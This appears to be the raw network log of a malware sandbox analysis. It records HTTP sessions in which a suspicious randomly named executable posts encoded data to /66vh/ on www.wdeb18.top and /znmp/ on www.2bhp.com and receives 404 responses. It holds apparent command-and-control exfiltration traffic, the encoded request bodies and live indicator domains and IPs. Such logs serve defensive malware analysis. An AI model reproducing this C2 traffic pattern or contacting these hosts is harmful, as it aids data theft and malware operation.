                      Data Raw: 34 72 6c 38 68 3d 70 5a 46 52 37 58 55 78 4a 2f 63 4b 30 2b 53 50 66 51 48 70 77 6d 5a 63 6e 4f 77 52 50 42 7a 34 70 72 6f 5a 63 41 39 34 48 59 2b 70 4a 32 6b 6b 73 37 39 47 75 62 69 72 50 49 74 41 45 4d 38 30 45 37 50 4f 2f 75 61 6c 52 76 6a 77 45 73 36 76 64 54 75 76 4c 45 77 39 41 79 66 4f 53 4c 62 52 75 51 74 33 58 31 64 79 67 58 6a 44 4b 74 6f 4b 58 4a 63 35 6d 44 6d 42 64 30 58 64 36 79 31 4f 43 35 2b 54 5a 44 51 31 70 50 72 74 56 38 42 61 72 72 45 57 34 52 32 70 48 4b 32 75 35 6d 74 50 50 53 57 7a 38 52 4d 4a 56 73 36 54 4b 50 4b 6f 52 70 73 68 59 72 50 6f 34 6a 4f 2b 51 73 77 39 67 67 3d 3d
                      Data Ascii: 4rl8h=pZFR7XUxJ/cK0+SPfQHpwmZcnOwRPBz4proZcA94HY+pJ2kks79GubirPItAEM80E7PO/ualRvjwEs6vdTuvLEw9AyfOSLbRuQt3X1dygXjDKtoKXJc5mDmBd0Xd6y1OC5+TZDQ1pPrtV8BarrEW4R2pHK2u5mtPPSWz8RMJVs6TKPKoRpshYrPo4jO+Qsw9gg==
                      Sep 22, 2024 18:02:41.546281099 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:02:41 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "66aa3fcf-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.449739206.119.82.147801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:02:43.214030027 CEST754OUTPOST /66vh/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.wdeb18.top
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.wdeb18.top
                      Referer: http://www.wdeb18.top/66vh/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 70 5a 46 52 37 58 55 78 4a 2f 63 4b 31 61 57 50 63 7a 66 70 32 47 5a 66 2b 2b 77 52 46 68 7a 38 70 72 73 5a 63 46 64 6f 48 71 61 70 4a 54 49 6b 74 2b 52 47 74 62 69 72 58 59 74 5a 41 4d 38 6a 45 37 7a 38 2f 75 6d 6c 52 76 48 77 45 73 71 76 63 69 75 73 4c 55 77 37 4d 53 66 51 57 4c 62 52 75 51 74 33 58 31 4a 49 67 58 37 44 4e 63 59 4b 57 73 6f 34 39 6a 6d 4f 4e 6b 58 64 74 43 31 43 43 35 2b 36 5a 48 51 66 70 4e 6a 74 56 39 78 61 72 36 45 56 68 68 32 72 4a 71 33 52 34 6c 38 62 58 44 54 65 39 41 49 32 57 4f 6d 75 43 70 62 79 41 59 4e 32 4b 72 72 62 6c 6b 48 4b 64 76 4e 30 37 75 58 36 6a 4c 49 56 7a 49 64 4a 6f 70 4e 57 62 5a 71 38 6d 61 6f 3d
                      Data Ascii: 4rl8h=pZFR7XUxJ/cK1aWPczfp2GZf++wRFhz8prsZcFdoHqapJTIkt+RGtbirXYtZAM8jE7z8/umlRvHwEsqvciusLUw7MSfQWLbRuQt3X1JIgX7DNcYKWso49jmONkXdtC1CC5+6ZHQfpNjtV9xar6EVhh2rJq3R4l8bXDTe9AI2WOmuCpbyAYN2KrrblkHKdvN07uX6jLIVzIdJopNWbZq8mao=
                      Sep 22, 2024 18:02:44.192863941 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:02:44 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "66aa3fcf-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.449740206.119.82.147801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:02:45.786467075 CEST10836OUTPOST /66vh/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.wdeb18.top
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.wdeb18.top
                      Referer: http://www.wdeb18.top/66vh/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 70 5a 46 52 37 58 55 78 4a 2f 63 4b 31 61 57 50 63 7a 66 70 32 47 5a 66 2b 2b 77 52 46 68 7a 38 70 72 73 5a 63 46 64 6f 48 71 53 70 4a 46 63 6b 72 5a 6c 47 73 62 69 72 62 34 74 45 41 4d 38 62 45 37 72 34 2f 75 72 53 52 74 50 77 46 4b 6d 76 56 33 4f 73 42 55 77 37 54 69 66 52 53 4c 62 45 75 51 38 38 58 32 78 49 67 58 37 44 4e 65 41 4b 57 35 63 34 36 54 6d 42 64 30 58 52 36 79 30 56 43 35 32 41 5a 48 64 71 70 63 44 74 56 64 68 61 73 49 73 56 2b 52 32 74 4f 71 33 4a 34 6c 77 74 58 48 7a 38 39 41 38 63 57 4d 36 75 41 64 76 76 52 4a 4d 76 64 4c 48 34 78 31 66 33 46 4e 64 4f 2f 74 48 2b 6f 75 6f 63 6d 61 4a 6e 73 70 59 69 4c 71 65 33 33 50 67 78 4a 56 65 47 71 79 61 39 73 71 4a 72 52 5a 56 36 4d 6e 73 5a 67 45 4c 69 55 71 75 36 4b 71 72 72 50 31 78 69 50 4b 4e 55 31 68 50 33 4a 61 33 6d 74 65 67 79 58 39 54 71 46 37 69 57 45 32 47 53 69 35 38 70 31 71 6d 6d 48 70 54 34 62 53 69 34 70 6f 78 72 39 33 33 53 4e 68 57 43 78 7a 64 69 6f 44 48 61 42 74 52 4c 49 39 36 2b 4d 39 57 43 38 77 55 65 [TRUNCATED]
                      Data Ascii: 4rl8h=pZFR7XUxJ/cK1aWPczfp2GZf++wRFhz8prsZcFdoHqSpJFckrZlGsbirb4tEAM8bE7r4/urSRtPwFKmvV3OsBUw7TifRSLbEuQ88X2xIgX7DNeAKW5c46TmBd0XR6y0VC52AZHdqpcDtVdhasIsV+R2tOq3J4lwtXHz89A8cWM6uAdvvRJMvdLH4x1f3FNdO/tH+ouocmaJnspYiLqe33PgxJVeGqya9sqJrRZV6MnsZgELiUqu6KqrrP1xiPKNU1hP3Ja3mtegyX9TqF7iWE2GSi58p1qmmHpT4bSi4poxr933SNhWCxzdioDHaBtRLI96+M9WC8wUeujAlhzBREcRhdbFwgdxGfwVYLFTEUaeg1RS3L7XfGWgxVUOPielKFeVKlF7x/oU53NSkxSoFFz5o0Jl6Imbd7aMB0wKtIAnI6IO5+WxcN9odh0SIrHUS4WYkwB0GalNhvNf/EtRLc+b3tG9xjMmcdnzuHk47FpRvRCzJZf+Ge/PDdhFVTuKM7ASjS6YdaBO+XqcRFyvnmw6gXtJ9IQx2z1+/FCjyW5A1+L3wBgSmwswiqQ9JrsEoNM5P6lyaMf4FEo8MWOk8YoIIxFudfn1Si3Im+WiMusas7NdUmFZmv+14fHkX8oyq4CMBYomr71aO2Ua0kzg3cC1iaH0XjQ5k6IcSmFRTqPBy72w6VHpx58KZ9J4AZ5MT8dJxGJDJ6bpYhzA1nSX+159dE128ZW2ZJXulT0Xl3eST783dKCQq8XKvvo6OKzyFPl3Jelm0U/V8kDQzxTXkiKS7ofKO3qx7yBcW7RZBYRSmI3v90GIKLaOVZZszt4urhp/P09VCH99fOCETmr7kCSc+KIJAbX2RkEUiNGlMI7UgX3nu8ePrEvrFAbE+8NsJjb/dkYuLVvLicfVsw1db2GhiEWHDyeFTm+ZlSIViFmG0q49nYeJOWcbfLoaA8dB4fdtpvK99hG8TYDiR8TWwUT8HO3xEM6jWYHlZAZt0Tm2tlp [TRUNCATED]
                      Sep 22, 2024 18:02:47.033452034 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:02:46 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "66aa3fcf-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.449741206.119.82.147801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:02:48.338900089 CEST476OUTGET /66vh/?4rl8h=kbtx4jUoEeJqru/eYSGX4Vxi+vYrNV7S+715NBpuIdmHZ1xIlp9jyY2cSJRvQOMSNpijnqr9Yv3PN/2sQDysWmAbAiXLeLXP7wBnaxk7t3LbEP86e95cii4=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.wdeb18.top
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:02:49.600567102 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:02:49 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "66aa3fcf-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Sep 22, 2024 18:02:49.603137016 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Sun, 22 Sep 2024 16:02:49 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "66aa3fcf-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.44974281.88.63.46801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:02:54.717338085 CEST728OUTPOST /znmp/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.2bhp.com
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.2bhp.com
                      Referer: http://www.2bhp.com/znmp/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 49 4a 4d 31 44 48 44 55 2b 78 45 34 47 4d 4b 76 57 4b 68 4a 32 43 37 79 37 47 64 57 4f 50 35 6d 54 44 56 33 69 39 4e 38 70 36 50 2f 6f 34 57 75 45 4a 5a 4c 67 76 6c 30 4a 61 73 43 39 36 66 53 4a 6e 55 42 68 32 58 57 48 6f 73 30 4f 73 76 49 49 61 62 64 49 66 6c 52 58 6e 52 4c 4d 55 6d 71 76 42 54 57 67 56 41 67 74 30 59 50 66 2b 32 6d 5a 61 58 65 68 71 66 34 78 38 51 67 79 33 52 49 72 66 51 56 79 49 41 6a 4d 2b 57 77 4a 31 4c 4b 78 2b 37 53 37 4f 6f 39 75 36 54 48 78 47 34 43 6b 6a 4e 4e 46 64 57 56 68 73 35 62 50 53 6a 56 63 6e 45 56 4a 6d 67 42 55 41 41 53 4e 5a 4c 66 76 77 3d 3d
                      Data Ascii: 4rl8h=IJM1DHDU+xE4GMKvWKhJ2C7y7GdWOP5mTDV3i9N8p6P/o4WuEJZLgvl0JasC96fSJnUBh2XWHos0OsvIIabdIflRXnRLMUmqvBTWgVAgt0YPf+2mZaXehqf4x8Qgy3RIrfQVyIAjM+WwJ1LKx+7S7Oo9u6THxG4CkjNNFdWVhs5bPSjVcnEVJmgBUAASNZLfvw==
                      Sep 22, 2024 18:02:55.418658018 CEST367INHTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:02:55 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.44974381.88.63.46801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:02:57.311199903 CEST748OUTPOST /znmp/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.2bhp.com
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.2bhp.com
                      Referer: http://www.2bhp.com/znmp/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 49 4a 4d 31 44 48 44 55 2b 78 45 34 48 73 36 76 55 70 4a 4a 39 43 36 41 69 32 64 57 41 66 35 69 54 44 5a 33 69 39 6c 73 70 4d 58 2f 6f 64 71 75 46 4d 74 4c 7a 66 6c 30 42 36 73 44 69 4b 66 5a 4a 6d 70 30 68 33 37 57 48 6f 49 30 4f 74 66 49 4a 71 6e 53 49 50 6c 70 4f 33 52 4a 42 30 6d 71 76 42 54 57 67 56 55 61 74 31 77 50 66 4f 71 6d 59 35 50 64 39 61 66 35 6d 4d 51 67 32 33 52 4d 72 66 51 72 79 4e 6b 4a 4d 38 2b 77 4a 30 37 4b 79 76 37 56 78 4f 6f 37 6a 61 53 79 37 6c 68 5a 74 68 49 65 47 50 6d 78 2f 76 5a 6e 4f 55 79 50 4e 57 6c 43 62 6d 45 79 4a 48 4a 6d 41 61 32 57 30 36 37 56 39 6c 35 49 4d 6d 57 6c 2f 37 41 71 68 44 53 51 71 77 73 3d
                      Data Ascii: 4rl8h=IJM1DHDU+xE4Hs6vUpJJ9C6Ai2dWAf5iTDZ3i9lspMX/odquFMtLzfl0B6sDiKfZJmp0h37WHoI0OtfIJqnSIPlpO3RJB0mqvBTWgVUat1wPfOqmY5Pd9af5mMQg23RMrfQryNkJM8+wJ07Kyv7VxOo7jaSy7lhZthIeGPmx/vZnOUyPNWlCbmEyJHJmAa2W067V9l5IMmWl/7AqhDSQqws=
                      Sep 22, 2024 18:02:57.967808008 CEST367INHTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:02:57 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.44974481.88.63.46801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:02:59.863231897 CEST10830OUTPOST /znmp/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.2bhp.com
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.2bhp.com
                      Referer: http://www.2bhp.com/znmp/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 49 4a 4d 31 44 48 44 55 2b 78 45 34 48 73 36 76 55 70 4a 4a 39 43 36 41 69 32 64 57 41 66 35 69 54 44 5a 33 69 39 6c 73 70 4d 76 2f 6f 4c 65 75 45 72 42 4c 69 76 6c 30 64 71 73 4f 69 4b 66 45 4a 6e 41 38 68 33 6e 5a 48 75 4d 30 4f 50 48 49 4f 5a 2f 53 44 50 6c 70 54 6e 52 49 4d 55 6d 7a 76 46 50 53 67 56 45 61 74 31 77 50 66 50 61 6d 52 4b 58 64 75 4b 66 34 78 38 51 57 79 33 52 6f 72 66 49 64 79 4e 67 7a 4e 4d 65 77 49 55 72 4b 30 64 54 56 39 4f 6f 35 74 36 53 71 37 6c 64 38 74 68 55 53 47 50 2b 50 2f 6f 70 6e 4f 53 54 47 61 55 5a 63 59 30 41 54 58 33 5a 68 44 74 66 57 31 59 48 58 33 56 4e 56 62 6c 65 4a 31 34 6c 5a 6c 78 79 45 7a 30 46 71 45 6f 49 53 6f 73 33 52 62 43 4a 58 4c 31 42 39 62 51 38 52 46 31 4c 30 59 6e 6a 54 72 54 61 42 71 56 79 58 65 6a 66 57 55 6d 44 32 54 4b 61 6e 69 69 50 70 62 35 77 61 4d 44 59 62 61 71 4f 4d 4f 30 63 6a 6d 55 31 71 32 63 59 6d 50 58 55 79 68 64 7a 59 70 56 4f 6e 4e 76 6e 6a 7a 6c 56 77 6b 75 43 72 34 71 77 43 50 55 4f 6c 7a 73 59 55 74 51 55 6a [TRUNCATED]
                      Data Ascii: 4rl8h=IJM1DHDU+xE4Hs6vUpJJ9C6Ai2dWAf5iTDZ3i9lspMv/oLeuErBLivl0dqsOiKfEJnA8h3nZHuM0OPHIOZ/SDPlpTnRIMUmzvFPSgVEat1wPfPamRKXduKf4x8QWy3RorfIdyNgzNMewIUrK0dTV9Oo5t6Sq7ld8thUSGP+P/opnOSTGaUZcY0ATX3ZhDtfW1YHX3VNVbleJ14lZlxyEz0FqEoISos3RbCJXL1B9bQ8RF1L0YnjTrTaBqVyXejfWUmD2TKaniiPpb5waMDYbaqOMO0cjmU1q2cYmPXUyhdzYpVOnNvnjzlVwkuCr4qwCPUOlzsYUtQUjNMXZUs/8Te/qb0hoXA2qusc2zqNhtZA6C78SqtsvsRATjaEb+IbjuPDcq44R1lDSogha70c8dNbi/PaBCbSX5jrVKO1EX+38y4gTzutXFiMGOWNurH94KNAA56kFIqTa/oxpm6H4dGNdJQFRYVZL72K2aQ7Ax4yucEajcP3OY9ZmZO1Wb+Edx1eeR3CH56q0fDJi068cLLPrm8SMuH58POnD83YjKSh422FXBVNnvBLPX492Jda8MQUQIr4sIs66907afUI5/0gbfDvwRhArGAqU6VPYYEFUdQqlyDaZT6N1puO+Q+792dE5JMtmgK1mP09YqXnOwi606CazUP7lJGsW2e4Q3u50lEKX/auxl9/i9bLyZIJDfnzbeAamvCJoGbAJAZH5H7Dzs+HMM4cHo6PlyeCbkrlT5RwnZOS+22/8jp8TutBlQ9vBdI8dwAZAgR7Yp9/qBM2+M+ZJzsmuMib8syjVwaJXvoFwsAfzmRQnEz8/bsXjY2YQkjV5i6v8tj6TIuSwwRpGEjI15pMfF2iPdMDba09NzZzeC7fIbNcBRhH40PfHcN48OSaD1mdo+jCQTBJWuksCRAjtmrYyoMCPirINu6m0HUx45dxs0ZsIZ8S0usiMv+rvXWEF5f8O0caU0rp3dT9TTYctstjpusUCT8SzLkfK8Z [TRUNCATED]
                      Sep 22, 2024 18:03:00.520443916 CEST367INHTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:03:00 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.44974581.88.63.46801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:03:02.689162970 CEST474OUTGET /znmp/?4rl8h=FLkVAxn7xj4ld/LvMrFB+iyX7UR4Kb9aE0AH2N1ZkKvu5bquFbdTibpxDosPiJzFKWZ1tBPnHLgAGvmlA5vrecd2eGdXAGmup0nokTlXrk0eb8OdUo3hkYI=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.2bhp.com
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:03:03.364600897 CEST367INHTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:03:03 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
